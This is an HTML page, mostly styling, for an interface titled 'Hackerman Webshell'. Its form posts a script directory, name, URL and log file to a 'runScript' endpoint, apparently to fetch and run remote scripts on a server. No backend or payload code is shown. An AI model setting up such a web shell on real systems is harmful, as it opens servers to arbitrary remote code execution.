<!DOCTYPE html>
<html>
<header>
<style>

.button {
  margin-top: 20px;
}

.center {
  max-width: 400px;
  display: block;
  margin-left: auto;
  margin-right: auto;
  width: 50%;
}

.text-center {
  text-align: center;
}

@font-face {
  font-family: 'SVN';
  src:
    url('./css/SVN-Determination\ Sans.otf') format('opentype');
}

@font-face {
  font-family: 'BRK';
  src:
    url('./css/upheavtt.ttf') format('truetype');
}

input,
html,
body {
  font-family: "SVN", "LatoOffline", sans-serif;
  background-color: #091F31 !important;
  color: #A5B0CC !important;
}

h1,
h2 {
  font-family: "SVN", "RalewayOffline", sans-serif;
  font-weight: 500;
  letter-spacing: 2px;
}

a {
  color: #337ab7;
  text-decoration: none;
}

.wrapper {
  position: absolute;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
}

.bg-top {
  width: 100%;
  height: 100vh;
  background: url('./img/top-background.svg') no-repeat top center;
  opacity: 0.3;
}
</style>
</header>
<body>
<div class="bg-top"></div>
<div class="wrapper">
  <div class="row">
	<div class="col-md-6 offset-md-3">
        	<img class="center" src="./img/logo.png" />
               	<div class="text-center">
                       	<h1>Hackerman Webshell</h1>
			<form action = "runScript" method = "post">
			<input type="text" name='script_dir'/>
      <input type="text" name='script_name'/>
      <input type="text" name='script_url'/>
      <input type="text" name='command_log_file'/>
			<input type="submit" name="submit" value="Submit"/>
			</form>
                </div>
                <br>
        </div>
	<div>
		<div class="text-center">
			<div id="history"></div>
		</div>
	</div>
  </div>
</div>
</body>
</html>